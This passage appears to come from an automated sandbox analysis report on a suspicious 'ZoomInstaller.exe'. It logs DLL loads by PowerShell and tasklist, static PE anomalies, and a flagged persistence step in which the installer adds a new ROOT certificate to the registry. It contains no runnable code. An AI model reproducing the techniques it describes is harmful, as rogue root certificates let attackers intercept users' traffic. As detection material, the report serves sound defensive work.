    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: ZoomInstaller.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: ZoomInstaller.exeStatic PE information: Image base 0x140000000 > 0x60000000
    Source: ZoomInstaller.exeStatic file information: File size 22207488 > 1048576
    Source: ZoomInstaller.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3e6000
    Source: ZoomInstaller.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x30f000
    Source: ZoomInstaller.exeStatic PE information: Raw size of /19 is bigger than: 0x100000 < 0x4e8c00
    Source: ZoomInstaller.exeStatic PE information: Raw size of /45 is bigger than: 0x100000 < 0x203200
    Source: ZoomInstaller.exeStatic PE information: Raw size of /81 is bigger than: 0x100000 < 0x38fe00
    Source: ZoomInstaller.exeStatic PE information: Raw size of /92 is bigger than: 0x100000 < 0x112200
    Source: ZoomInstaller.exeStatic PE information: Raw size of /141 is bigger than: 0x100000 < 0x17ec00
    Source: ZoomInstaller.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: ZoomInstaller.exeStatic PE information: section name: .xdata
    Source: ZoomInstaller.exeStatic PE information: section name: /4
    Source: ZoomInstaller.exeStatic PE information: section name: /19
    Source: ZoomInstaller.exeStatic PE information: section name: /31
    Source: ZoomInstaller.exeStatic PE information: section name: /45
    Source: ZoomInstaller.exeStatic PE information: section name: /57
    Source: ZoomInstaller.exeStatic PE information: section name: /70
    Source: ZoomInstaller.exeStatic PE information: section name: /81
    Source: ZoomInstaller.exeStatic PE information: section name: /92
    Source: ZoomInstaller.exeStatic PE information: section name: /106
    Source: ZoomInstaller.exeStatic PE information: section name: /125
    Source: ZoomInstaller.exeStatic PE information: section name: /141
    Source: ZoomInstaller.exeStatic PE information: section name: /157
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9BAD1D9F push esp; iretd 17_2_00007FFD9BAD2043

    Persistence and Installation Behavior

    barindex
    Installs new ROOT certificates
    Source: C:\Users\user\Desktop\ZoomInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
